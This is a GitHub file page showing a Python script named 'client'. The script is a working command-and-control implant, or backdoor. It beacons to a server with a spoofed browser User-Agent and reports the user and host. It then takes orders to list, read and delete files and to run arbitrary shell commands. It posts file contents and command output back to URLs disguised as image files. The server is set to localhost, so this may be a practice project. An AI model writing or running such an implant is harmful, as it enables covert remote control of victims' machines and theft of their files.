-
Notifications
You must be signed in to change notification settings - Fork 0
/
client
executable file
·107 lines (87 loc) · 3.63 KB
/
client
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/python3
import requests, os, socket, json, subprocess
from time import sleep
init = requests.post("http://localhost:8080/initialize/syn", data = {"initialize": "SYN"}, headers={"User-Agent":"Mozilla/5.0"})
if init.text != 'ACK':
print("Error")
exit(1)
while True:
cmd = requests.post("http://localhost:8080/initialize/ack", headers={"User-Agent":"Mozilla/5.0"}, data = {"initialize": "ACK", "username": os.getenv("USER"), "hostname": socket.gethostname(), "cwd": os.getcwd()}).text
cmdlist = json.loads(cmd)
for x in cmdlist:
cmd = cmdlist[x]
if cmd == 'KILL':
try:
requests.post("http://localhost:8080/assets/ghost.png", data = {"cmd": "KILL"})
except:
doNothing = True
exit(0)
elif cmd == 'ls':
files = os.listdir()
files.sort()
list = ''
for x in files:
list += "%s;" % x
data = {"list": list}
requests.post("http://localhost:8080/assets/flower.jpg", data=data)
elif cmd == 'pwd':
data = {"pwd": os.getcwd()}
requests.post("http://localhost:8080/assets/bug.jpg", data=data)
elif 'cd' in cmd:
dir = cmd[3:]
if os.path.exists(dir):
os.chdir(dir)
success = 'True'
else:
success = 'False'
data = {'dir': dir, 'pwd': os.getcwd(), 'success': success}
requests.post("http://localhost:8080/assets/fly.jpg", data=data)
elif 'cat' in cmd:
file = cmd[4:]
if os.path.exists(file):
with open(file, 'r') as f:
data = {'file': file, 'content': f.read()}
requests.post("http://localhost:8080/assets/cat.jpg", data=data)
elif 'shell' in cmd:
command = cmd[6:]
cmdarr = command.split(' ')
output = subprocess.run(cmdarr,stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.decode('UTF-8')
data = {"cmd": command, "output": output}
requests.post("http://localhost:8080/assets/mudcrab.jpg", data=data)
elif 'download' in cmd:
arr = cmd[9:].split(' ')
if len(arr) == 1:
filename = arr[0]
remote_filename = arr[0]
elif len(arr) == 2:
filename = arr[1]
remote_filename = arr[0]
else:
success = 'False'
continue
if os.path.exists(remote_filename):
content = open(filename, 'r').read()
success = 'True'
else:
success = 'False'
data = {"filename": filename, "remote_filename": remote_filename, "content": content, "success": success}
requests.post("http://localhost:8080/assets/lion.jpg", data=data)
elif 'delete' in cmd:
file = cmd[7:]
if os.path.exists(file):
success = 'True'
os.remove(file)
else:
success = 'False'
data = {"filename": file, "success": success}
requests.post("http://localhost:8080/assets/bat.jpg", data=data)
elif 'sleep' in cmd:
try:
time = cmd[6:]
data = {"sleep": time}
requests.post("http://localhost:8080/assets/bear.jpg", data=data)
time = int(time)
sleep(time)
except:
data = {"sleep": "False"}
requests.post("http://localhost:8080/assets/bear.jpg", data=data)